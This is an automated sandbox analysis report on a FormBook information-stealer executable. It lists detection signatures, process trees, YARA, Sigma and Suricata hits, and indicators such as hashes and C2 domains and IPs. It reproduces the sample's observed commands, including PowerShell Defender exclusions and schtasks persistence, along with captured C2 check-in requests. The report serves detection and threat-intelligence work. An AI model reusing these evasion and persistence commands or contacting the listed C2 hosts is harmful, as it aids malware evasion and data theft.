Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
C6Abn5cBei.exe

Overview

General Information

Sample name:C6Abn5cBei.exe
renamed because original name is a hash value
Original sample name:65990a23e7f833be5f9a90b3a50dc246ec89ffdb4bcc1895c5fe4917438483ce.exe
Analysis ID:1588774
MD5:3f10d9ae24f018b0ca90a3f5b4365c48
SHA1:d19111d80986035ecd143bc04d0a46b600aa3e4b
SHA256:65990a23e7f833be5f9a90b3a50dc246ec89ffdb4bcc1895c5fe4917438483ce
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • C6Abn5cBei.exe (PID: 2916 cmdline: "C:\Users\user\Desktop\C6Abn5cBei.exe" MD5: 3F10D9AE24F018B0CA90A3F5B4365C48)
    • powershell.exe (PID: 3572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zdDlscHlw.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1292 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6508 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • C6Abn5cBei.exe (PID: 5084 cmdline: "C:\Users\user\Desktop\C6Abn5cBei.exe" MD5: 3F10D9AE24F018B0CA90A3F5B4365C48)
      • mDeEygzSIDmBTP.exe (PID: 6856 cmdline: "C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regini.exe (PID: 4832 cmdline: "C:\Windows\SysWOW64\regini.exe" MD5: C99C3BB423097FCF4990539FC1ED60E3)
          • mDeEygzSIDmBTP.exe (PID: 5124 cmdline: "C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6752 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • zdDlscHlw.exe (PID: 2884 cmdline: C:\Users\user\AppData\Roaming\zdDlscHlw.exe MD5: 3F10D9AE24F018B0CA90A3F5B4365C48)
    • schtasks.exe (PID: 7080 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmp175E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • zdDlscHlw.exe (PID: 6344 cmdline: "C:\Users\user\AppData\Roaming\zdDlscHlw.exe" MD5: 3F10D9AE24F018B0CA90A3F5B4365C48)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.2686152475.0000000002FA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000011.00000002.2688254517.00000000035A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.1876826679.0000000001620000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.C6Abn5cBei.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              9.2.C6Abn5cBei.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\C6Abn5cBei.exe", ParentImage: C:\Users\user\Desktop\C6Abn5cBei.exe, ParentProcessId: 2916, ParentProcessName: C6Abn5cBei.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", ProcessId: 3572, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\C6Abn5cBei.exe", ParentImage: C:\Users\user\Desktop\C6Abn5cBei.exe, ParentProcessId: 2916, ParentProcessName: C6Abn5cBei.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", ProcessId: 3572, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmp175E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmp175E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\zdDlscHlw.exe, ParentImage: C:\Users\user\AppData\Roaming\zdDlscHlw.exe, ParentProcessId: 2884, ParentProcessName: zdDlscHlw.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmp175E.tmp", ProcessId: 7080, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\C6Abn5cBei.exe", ParentImage: C:\Users\user\Desktop\C6Abn5cBei.exe, ParentProcessId: 2916, ParentProcessName: C6Abn5cBei.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp", ProcessId: 6508, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\C6Abn5cBei.exe", ParentImage: C:\Users\user\Desktop\C6Abn5cBei.exe, ParentProcessId: 2916, ParentProcessName: C6Abn5cBei.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", ProcessId: 3572, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\C6Abn5cBei.exe", ParentImage: C:\Users\user\Desktop\C6Abn5cBei.exe, ParentProcessId: 2916, ParentProcessName: C6Abn5cBei.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp", ProcessId: 6508, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T05:21:51.967852+010028554651A Network Trojan was detected192.168.2.849712172.67.145.23480TCP
                2025-01-11T05:22:36.706516+010028554651A Network Trojan was detected192.168.2.84974443.199.54.15880TCP
                2025-01-11T05:22:50.301222+010028554651A Network Trojan was detected192.168.2.849955154.88.22.10780TCP
                2025-01-11T05:23:05.129591+010028554651A Network Trojan was detected192.168.2.849991154.23.184.9580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T05:22:08.786803+010028554641A Network Trojan was detected192.168.2.84971343.199.54.15880TCP
                2025-01-11T05:22:11.567999+010028554641A Network Trojan was detected192.168.2.84971443.199.54.15880TCP
                2025-01-11T05:22:14.318121+010028554641A Network Trojan was detected192.168.2.84972743.199.54.15880TCP
                2025-01-11T05:22:42.651153+010028554641A Network Trojan was detected192.168.2.849906154.88.22.10780TCP
                2025-01-11T05:22:45.210232+010028554641A Network Trojan was detected192.168.2.849924154.88.22.10780TCP
                2025-01-11T05:22:47.764735+010028554641A Network Trojan was detected192.168.2.849937154.88.22.10780TCP
                2025-01-11T05:22:56.825316+010028554641A Network Trojan was detected192.168.2.849988154.23.184.9580TCP
                2025-01-11T05:22:59.498294+010028554641A Network Trojan was detected192.168.2.849989154.23.184.9580TCP
                2025-01-11T05:23:02.595856+010028554641A Network Trojan was detected192.168.2.849990154.23.184.9580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T05:22:08.786803+010028563181A Network Trojan was detected192.168.2.84971343.199.54.15880TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: C6Abn5cBei.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeAvira: detection malicious, Label: HEUR/AGEN.1309499
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeReversingLabs: Detection: 63%
                Multi AV Scanner detection for submitted file
                Source: C6Abn5cBei.exeReversingLabs: Detection: 63%
                Source: C6Abn5cBei.exeVirustotal: Detection: 65%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.C6Abn5cBei.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.C6Abn5cBei.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.2686152475.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2688254517.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1876826679.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2690431464.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1876572598.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2688146046.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: C6Abn5cBei.exeJoe Sandbox ML: detected
                Source: C6Abn5cBei.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C6Abn5cBei.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: vpxg.pdb source: C6Abn5cBei.exe, zdDlscHlw.exe.0.dr
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mDeEygzSIDmBTP.exe, 00000010.00000000.1799904534.00000000008DE000.00000002.00000001.01000000.0000000D.sdmp, mDeEygzSIDmBTP.exe, 00000014.00000002.2687661742.00000000008DE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: C6Abn5cBei.exe, 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003960000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1874104293.000000000360E000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1877107030.00000000037B8000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003AFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: C6Abn5cBei.exe, C6Abn5cBei.exe, 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003960000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1874104293.000000000360E000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1877107030.00000000037B8000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003AFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: C6Abn5cBei.exe, 00000009.00000002.1874594973.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2687716808.0000000001578000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: vpxg.pdbSHA256 source: C6Abn5cBei.exe, zdDlscHlw.exe.0.dr
                Source: Binary string: regini.pdb source: C6Abn5cBei.exe, 00000009.00000002.1874594973.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2687716808.0000000001578000.00000004.00000020.00020000.00000000.sdmp

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49713 -> 43.199.54.158:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.8:49713 -> 43.199.54.158:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49712 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49906 -> 154.88.22.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 43.199.54.158:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 43.199.54.158:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49937 -> 154.88.22.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49955 -> 154.88.22.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49990 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49744 -> 43.199.54.158:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49924 -> 154.88.22.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49989 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49988 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49991 -> 154.23.184.95:80
                Source: Joe Sandbox ViewIP Address: 172.67.145.234 172.67.145.234
                Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /7nvw/?avRhn=bbdDITTjVn5ZxI6GN1reGwP2o2vtBS0PP+WRiGeKfyb/2X6tLhCWc3R74LhPSoYzFVfNV33VjCQJaZkJOo229iZLjgC+IdiuBJhC/u8wioHnAK20zfUoQLw8DCuNy8wJow==&fjo=vjgP0XDx HTTP/1.1Host: www.vayui.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global trafficHTTP traffic detected: GET /iodk/?avRhn=dmGO6CepyY0nvsEd+06VKI64gib0AW2YSER1oXhei8AaXzs2ne8+dyZVwWklDlgafwdROfr4xQPj+g6hlFS8zXJSWm+a/FKDEmKpBMgLDWMch8H+yCAXb5nRSFJrzKqcGg==&fjo=vjgP0XDx HTTP/1.1Host: www.327531.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global trafficHTTP traffic detected: GET /63n1/?fjo=vjgP0XDx&avRhn=wxKP0Ki1Kkw6YH7/nhrbl3WDemgIBFZSdqxOdzuCPyveB98x1djFf0ZtvUhWTFSc0EIYzppqTCA/sqplXndAstOOZytUbFrdg7631H3C/N1OxVxb3rHD3zi4wEM6AspOKA== HTTP/1.1Host: www.cg19g5.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global trafficHTTP traffic detected: GET /ebw6/?avRhn=g7KNPNtXo04gJA8a0AickIpMAuCVSKId0JNEKh4/LAY7mt0u3u5aX//D26eCeQ1UgdXt5Q7OBZBmmBkcIEzHCZ/YcP8NJRKC5us+1o1KLAKIeLhdJLJPk6Ry+qmxzeVySw==&fjo=vjgP0XDx HTTP/1.1Host: www.hm35s.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global trafficDNS traffic detected: DNS query: www.vayui.top
                Source: global trafficDNS traffic detected: DNS query: www.327531.buzz
                Source: global trafficDNS traffic detected: DNS query: www.cg19g5.pro
                Source: global trafficDNS traffic detected: DNS query: www.hm35s.top
                Source: unknownHTTP traffic detected: POST /iodk/ HTTP/1.1Host: www.327531.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.327531.buzzReferer: http://www.327531.buzz/iodk/Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 206Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4Data Raw: 61 76 52 68 6e 3d 51 6b 75 75 35 31 62 6d 2b 4a 4a 32 75 6f 34 51 69 45 6e 68 59 75 32 49 69 79 53 33 59 47 69 2f 56 55 67 69 39 58 4e 66 6d 70 63 43 59 67 4e 32 67 4a 55 72 4f 54 35 4d 39 43 73 64 58 55 64 64 57 45 38 4f 54 74 44 35 38 43 76 41 2f 56 2b 32 6d 57 33 6b 75 6b 63 72 56 43 71 57 77 67 43 35 5a 6c 43 58 41 38 5a 4e 4f 57 6b 67 6b 6f 2f 51 34 54 63 58 66 62 61 44 61 32 46 47 38 4f 76 77 56 74 77 50 70 67 4b 46 2b 4a 69 51 2b 50 54 77 2f 4d 32 79 61 73 39 61 46 4b 37 74 2b 52 6a 4a 5a 45 6b 31 2b 66 55 33 4a 30 30 61 44 39 6f 4d 7a 33 54 69 57 39 6f 62 2f 76 7a 53 41 37 53 44 4d 76 61 65 4b 45 34 3d Data Ascii: avRhn=Qkuu51bm+JJ2uo4QiEnhYu2IiyS3YGi/VUgi9XNfmpcCYgN2gJUrOT5M9CsdXUddWE8OTtD58CvA/V+2mW3kukcrVCqWwgC5ZlCXA8ZNOWkgko/Q4TcXfbaDa2FG8OvwVtwPpgKF+JiQ+PTw/M2yas9aFK7t+RjJZEk1+fU3J00aD9oMz3TiW9ob/vzSA7SDMvaeKE4=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:21:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMkFGydQEVcX%2FI72bpSlfhYmwMFAukZfdDVw01szeT4gepTsJezfmdSYCBPb%2Bw1NbyF%2FU8ciYdQ9pFM7%2BstEiHLAFqGEJAfnXlUALxS8VRsAkO%2F2DVsmpZm5iHlKcU05"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90021f568bdc4240-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1557&rtt_var=778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=509&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 